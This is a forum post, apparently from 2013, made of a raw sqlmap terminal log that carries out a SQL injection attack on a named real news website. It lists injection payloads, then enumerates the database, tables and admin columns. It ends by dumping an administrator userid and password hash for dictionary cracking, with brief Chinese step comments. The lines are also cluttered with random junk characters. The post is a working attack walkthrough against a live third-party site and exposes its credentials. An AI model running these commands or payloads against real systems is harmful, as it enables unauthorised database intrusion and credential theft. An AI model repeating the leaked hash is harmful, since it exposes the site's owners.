D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# S1 F) E- Y( S! Z
ms "Mysql" --current-user /* 注解:获取当前用户名称
7 t8 w: S: o: C8 O1 H, Q sqlmap/0.9 - automatic SQL injection and database takeover tool/ e) h% v! Q2 V: P! d6 r2 N, I b& L
http://sqlmap.sourceforge.net starting at: 16:53:54
" [. s8 v+ Q, y. W& S' T[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as9 O3 b6 c$ \5 ?! i
session file
7 a5 f4 N: V V2 ?[16:53:54] [INFO] resuming injection data from session file$ A) X ]$ m, g
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
3 v% ]: v5 U7 Q. Y8 S% Q* F[16:53:54] [INFO] testing connection to the target url
- ?5 d4 h2 x7 O# @sqlmap identified the following injection points with a total of 0 HTTP(s) reque4 |7 |9 h& U# L4 U$ [. d. B
sts:% b. h; f; E3 ~4 T0 t# f) K
---
8 S6 P6 N/ X( Q4 k* o' ]- \Place: GET
% }5 \3 y$ \* b" h; Z2 C$ lParameter: id! J! L2 m+ r8 N7 F; w @
Type: boolean-based blind
6 _ M0 D7 V/ ^5 V3 f7 u- u Title: AND boolean-based blind - WHERE or HAVING clause8 E6 q% y8 v$ P
Payload: id=276 AND 799=799
1 b# J' x* D' W8 a ~+ h9 R4 Q Type: error-based
0 F0 B7 B6 k$ s9 m Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause* y; P$ \6 c1 z" @
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,/ s0 k- C+ y# l& e0 D
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
0 z( j: b0 s! o),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
% k( |. [- Z& @ Type: UNION query
- v0 N8 d( F6 s2 Y! G, p" r Title: MySQL UNION query (NULL) - 1 to 10 columns" `; }; K' E6 A
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR8 y' j$ c+ Z+ n* b
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
0 o; M& t- I5 o5 l w: m; TCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
* h- f! C# D( F( O8 N0 k* Q& b5 | Type: AND/OR time-based blind
( B( L! n/ U% F7 u; q/ t& I& j5 m2 C! L Title: MySQL > 5.0.11 AND time-based blind
' B" |$ m, G; r Payload: id=276 AND SLEEP(5)
/ g0 b( k- ^) |9 A---
7 K3 B6 o U, n* `3 I[16:53:55] [INFO] the back-end DBMS is MySQL" ]; `/ T2 w! m! V! B
web server operating system: Windows' |' `' [4 C; I: R& r8 {
web application technology: Apache 2.2.11, PHP 5.3.0
6 G7 B6 Q' c0 @0 l- Dback-end DBMS: MySQL 5.0
l8 F1 W" G- t4 ~$ x[16:53:55] [INFO] fetching current user
4 F* J" i3 i) o0 n: qcurrent user: 'root@localhost' : M% G3 z& [! @/ _
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
5 @- R: l0 P& s" q! w3 ?tput\www.wepost.com.hk' shutting down at: 16:53:58
2 c# l& S% H2 E) s! R
3 M* n. ^8 @9 `: O2 ?" p7 J; mD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
0 i% N6 `9 }3 \9 m5 k, j; I- Mms "Mysql" --current-db /*当前数据库 R9 F% p, `5 T" C) V; l
sqlmap/0.9 - automatic SQL injection and database takeover tool% x5 b& \6 f L+ S& Z2 T2 M
http://sqlmap.sourceforge.net starting at: 16:54:16
- t8 x* s6 X: `9 b[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as9 F ?9 F8 D& _$ `# _& N9 A
session file
+ D: x) Q V/ X5 g+ k[16:54:16] [INFO] resuming injection data from session file
( X7 V E! @: Q[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
1 n' q% O2 K" N% G[16:54:16] [INFO] testing connection to the target url
% @8 z" Y C! {0 K' gsqlmap identified the following injection points with a total of 0 HTTP(s) reque
: n" @* J0 ?3 y" V7 \8 Ssts:
m7 _# \# ?( l1 d0 ]+ {---1 w0 p) K7 Q3 S2 }) o) B; n/ p
Place: GET9 z+ p5 Y6 T/ g& U# L
Parameter: id. y7 a! H# w; I6 J3 |/ V/ c
Type: boolean-based blind
8 b n3 u# y1 `% p) H Title: AND boolean-based blind - WHERE or HAVING clause
. ?; D+ K2 D& z1 Z4 G+ ] Payload: id=276 AND 799=7994 _" C0 Y( c( P7 e7 x3 N9 a K6 R
Type: error-based( T4 u$ Q9 `3 s" e: F6 v6 y
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
: V0 \1 Q$ C; `4 W2 R; W7 `; y7 F Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
3 }" Q; ^, i! ~! I$ ]- G& E( h120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% }; y( e" l2 y* t/ X
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
7 V. C6 R; x6 t- |) f+ N; J Type: UNION query' u* u% |6 m5 z7 ^: K5 q. k4 \
Title: MySQL UNION query (NULL) - 1 to 10 columns& N2 I" c" o- }# Q6 [) i
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
+ a8 F6 G$ S2 u! v* g(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
+ h; ?* D( R+ H4 t T" YCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#2 f7 \% Q6 j o4 a" q c; ~' T k
Type: AND/OR time-based blind$ b% Y3 ~# |2 H. b# ?
Title: MySQL > 5.0.11 AND time-based blind
( s* P `9 Q* h/ t Payload: id=276 AND SLEEP(5)' m& \9 R0 p4 m2 v) u
---/ d) A# |2 E) I# }1 ~" ?) ^
[16:54:17] [INFO] the back-end DBMS is MySQL, F8 d' j! ]# ^* Z
web server operating system: Windows
/ G; ~! o; ^7 Rweb application technology: Apache 2.2.11, PHP 5.3.0
! i6 H8 O4 ^' [8 S2 F9 }back-end DBMS: MySQL 5.0
2 ?0 [9 D m4 b; a[16:54:17] [INFO] fetching current database4 a0 i& C, I" T: }" _, P8 v- C
current database: 'wepost': [# }" |# C: m3 h" O# ~4 T1 S2 S. F( E
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou2 I$ }) _3 ?$ G6 [3 I4 F
tput\www.wepost.com.hk' shutting down at: 16:54:18/ }% F6 K1 M# z# R, x- `, w6 k
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
9 _* J7 U; ^- m4 H, |4 j$ l7 nms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
' I o( E# Q+ [6 w' n sqlmap/0.9 - automatic SQL injection and database takeover tool5 |# v. E) U: {( u
http://sqlmap.sourceforge.net starting at: 16:55:257 u5 a% q7 b* n
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as' y! F2 `' N4 l9 o1 C
session file
% y. B5 P% j9 l6 \& h/ [+ t[16:55:25] [INFO] resuming injection data from session file2 m8 M* f6 \. l" x T
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file: ^5 q, }1 f7 v: [. S( A6 E3 e: z
[16:55:25] [INFO] testing connection to the target url; T9 K- |& \3 t
sqlmap identified the following injection points with a total of 0 HTTP(s) reque5 l+ P+ B( i, |
sts:
2 f" l5 s3 X9 q; F- K/ J; M---6 s: [, u; x; ?/ s% Z
Place: GET
' K. Z# b$ `, u5 ZParameter: id
2 P0 {; W. I" }( x4 t Type: boolean-based blind5 \$ g# H% t& y) r$ f
Title: AND boolean-based blind - WHERE or HAVING clause
. _) [" K% S, F0 o Payload: id=276 AND 799=799' k4 s6 G7 L* b) k. ~, {& ]
Type: error-based x/ l8 w/ q# M, B/ R3 Y
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
0 i4 l* R$ x, f; _7 D Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
; V* w; q! G) G) b4 H; ~+ _! z2 Z120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
, n1 T) k- K$ E7 K),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
; C- o0 x$ u) M. o( B5 I- b Type: UNION query2 q' f: E. |/ b/ S0 G- |
Title: MySQL UNION query (NULL) - 1 to 10 columns
3 e& l$ d4 S8 _ o1 { Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
3 _" g" F6 j* G, [! a(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
* h* @ Q/ _: b" [% Z* mCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
' O- J4 D) K. g; a Type: AND/OR time-based blind
1 F; _# ^- `$ N0 j" e Title: MySQL > 5.0.11 AND time-based blind
# J. R2 k" Z9 `- F1 ?. X3 A Payload: id=276 AND SLEEP(5)
( V8 p5 v& }$ x/ X6 z---( d% D2 A0 q" z% C
[16:55:26] [INFO] the back-end DBMS is MySQL
7 e s; z" N6 i) R9 ~% hweb server operating system: Windows7 e$ T8 w; x' v- s3 S, M2 O
web application technology: Apache 2.2.11, PHP 5.3.0' u# F; J9 `" O. s
back-end DBMS: MySQL 5.0
* _2 m' a4 [/ L8 P( s S7 L[16:55:26] [INFO] fetching tables for database 'wepost'
. W. v+ N- [' {8 s0 ?[16:55:27] [INFO] the SQL query used returns 6 entries
( c7 @! l5 U' N2 ^Database: wepost3 y: F! a$ T! l+ r* ~
[6 tables]; Z+ e0 y. `" d. Z) K% ?
+-------------+
( v) p# T. J; ^4 Y9 }6 _& r| admin |* w: t7 [. L! w% _/ V' a9 g9 g7 J
| article |0 d9 f+ {, ^4 T% `
| contributor |
* w# `4 ?9 @0 F! Q| idea |
( L: f! [9 O- `; u| image |
2 v# I% A7 M- P5 G& G! P) }1 P| issue |( @. n8 l" _8 Z7 G4 b
+-------------+$ b. J4 K1 |4 R
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou% R$ r/ i9 W# R% A: h& n* y+ F
tput\www.wepost.com.hk' shutting down at: 16:55:337 V/ W, d& X" |+ ]
! M7 C# j3 h* t/ Z& v. Z: G( f
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
' `, E& q0 P; W4 M' J8 _ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
+ d5 O6 U$ E1 w, v( K+ B+ N sqlmap/0.9 - automatic SQL injection and database takeover tool
/ D9 i/ [; l5 T http://sqlmap.sourceforge.net starting at: 16:56:06
* {- g& a. v2 Xsqlmap identified the following injection points with a total of 0 HTTP(s) reque
+ S% O8 ]9 d+ a) ksts:
) {6 Q/ w( T0 |' o. m% R2 M0 x---! ~' R$ @% [8 c l9 L8 k
Place: GET. L) [) X5 ?, l2 ]% J7 s
Parameter: id9 V* I9 _! |/ m8 I# k+ [3 ?3 D
Type: boolean-based blind
& A" g# M* ~8 P, F/ b0 ~" @ Title: AND boolean-based blind - WHERE or HAVING clause
+ ~: T8 ~) y" W4 P% Q( s5 R' R Payload: id=276 AND 799=799( ?: u5 b* a6 \* j1 z& I
Type: error-based
+ j# ]5 ?) h: U; f# R% Q& t Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
3 }% h, f! Z$ }% Q* M F1 O6 r# W Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
( r4 v4 t+ h0 x5 q4 e$ X0 g120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
! S/ J/ F: [- p; w' T! O),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 E& `. d. @% {1 ?: c9 t
Type: UNION query4 q3 Y$ _ c+ N' N# O7 ?$ Q
Title: MySQL UNION query (NULL) - 1 to 10 columns3 E: z9 l) C3 P. c& \3 O
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
- @% L4 K& {/ X6 b( d. B" A(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
, P/ F4 f$ U; Y- H5 KCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
7 y( @2 D% _% c' L Type: AND/OR time-based blind
" m$ l2 A& j7 o9 J& I2 O& E( Z Title: MySQL > 5.0.11 AND time-based blind
8 k. F6 ?* q4 ?9 x0 F" q2 \, ~ Payload: id=276 AND SLEEP(5). G; [$ r1 V1 v0 J1 |" @
---
! O0 y3 B* i; I0 `8 Pweb server operating system: Windows8 B0 v% z: d/ H) b) n
web application technology: Apache 2.2.11, PHP 5.3.0
$ ^- O9 ]0 {" u; H% F9 Pback-end DBMS: MySQL 5.0
$ f4 H! C8 U& E- y* ?[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
: V7 j1 T. k3 K! d* lssion': wepost, wepost( _( i4 ]$ C& ?8 d/ D/ ]! m5 r
Database: wepost
' u: i* W5 k( h" d4 UTable: admin( Y7 W- `2 j7 @! T
[4 columns]. |/ l8 \6 R6 G4 x/ n7 l: O) S
+----------+-------------+ U L4 N7 g0 I: z
| Column | Type |
3 i6 A; N( C! L4 f9 A8 Z+----------+-------------+
, S/ Y2 N4 {! U; e' u9 m2 H| id | int(11) |
# q, ], e5 K; q U( U5 w| password | varchar(32) |( x& T. f" i5 a& m/ ?& L
| type | varchar(10) |( `2 z4 n8 ^5 {6 [% [7 c8 Q. Z
| userid | varchar(20) |3 A9 p! w; ?. z5 ~' c
+----------+-------------+. V$ T' Z& H* ^6 b W8 i- h
shutting down at: 16:56:19
0 V0 \( Z( @" N9 n/ z) n5 r% T
: T/ F. P) F; n" n5 {* R g. `3 xD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# |3 B$ n& Y @, i
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容" K) f' f" ?1 Y. C! n$ n
sqlmap/0.9 - automatic SQL injection and database takeover tool3 c1 t4 ~8 w+ w7 J2 L7 K/ H0 w5 W
http://sqlmap.sourceforge.net starting at: 16:57:14$ z7 V( n- {- K1 f8 W* j
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
$ N3 r9 L/ g! jsts:
# a. P8 F! d9 E, M# {! R---9 m7 W" W" d3 n
Place: GET
( v( v* Y X% H" r+ zParameter: id
/ c C7 F5 A0 Q: b4 x% Z5 P# ? Type: boolean-based blind% M% ]. N( |! |
Title: AND boolean-based blind - WHERE or HAVING clause2 D! c2 E3 n* k+ c' s
Payload: id=276 AND 799=799- X; I5 x4 s. J5 v; K( e
Type: error-based7 I Y" T: G7 H/ R; W
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 ]- H9 ~( v0 z* a
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,: j5 m4 r2 Z5 s1 J% r
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58$ f0 i+ ?1 u6 G
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 h. Q. a( H6 S. ]) P4 P0 A3 m
Type: UNION query
6 Q9 a3 k3 C1 L7 B7 T% e8 h: a Title: MySQL UNION query (NULL) - 1 to 10 columns
5 r3 [2 M/ m! ?$ t- C Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR( x1 W" K2 N# j4 L, y. ]# U- k
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 {) C% G+ p }% A' L9 Z& W2 `: ^
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 ^ @, w8 q2 U+ n
Type: AND/OR time-based blind
* B- t& S/ X0 B* U6 r/ ] Title: MySQL > 5.0.11 AND time-based blind
% G3 {+ K1 d5 b Payload: id=276 AND SLEEP(5); J8 q2 Y1 J3 H$ U# a
---
2 |& o' [" X' d/ G/ Aweb server operating system: Windows! ?8 p: k/ y. f2 \, O) z: m
web application technology: Apache 2.2.11, PHP 5.3.0, b, ?7 I+ H# j& W( A6 h
back-end DBMS: MySQL 5.07 U" i v5 z, {
recognized possible password hash values. do you want to use dictionary attack o- C3 l* q, }+ G: {7 {
n retrieved table items? [Y/n/q] y
6 l; e5 n4 V9 U2 Ewhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
# n1 q6 V7 z/ Qdo you want to use common password suffixes? (slow!) [y/N] y+ ~$ y3 z7 m& S, x
Database: wepost& T+ Q" R0 p9 Q4 V
Table: admin
% A. G% a- P# q) Z1 G/ S[1 entry]+ ~- v ?; Q2 y0 C8 s, _, k
+----------------------------------+------------+& {4 z8 H/ Z0 p/ B9 B# _- j2 b
| password | userid |
1 P5 m( u! l7 l# s( @+----------------------------------+------------+2 i3 ~1 d* P( P7 @
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |2 k$ U3 j8 t8 R0 _0 j
+----------------------------------+------------+" V3 D/ r$ f- U5 m- Z5 G. p$ v' p4 U
shutting down at: 16:58:14
; S- _. k# _1 Y! ]" _- z+ V: Q3 z6 {
$ `: J$ |7 o! RD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对